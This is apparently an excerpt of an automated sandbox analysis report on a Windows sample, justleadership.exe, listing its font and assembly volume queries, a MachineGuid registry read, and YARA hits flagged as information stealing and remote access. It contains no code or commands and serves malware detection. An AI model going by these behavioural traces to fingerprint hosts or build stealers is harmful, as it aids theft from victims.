Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\modern.fon VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\roman.fon VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\script.fon VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\coure.fon VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\sserife.fon VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\sseriff.fon VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\smalle.fon VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2147404072.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: justleadership.exe PID: 7144, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2147404072.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: justleadership.exe PID: 7144, type: MEMORYSTR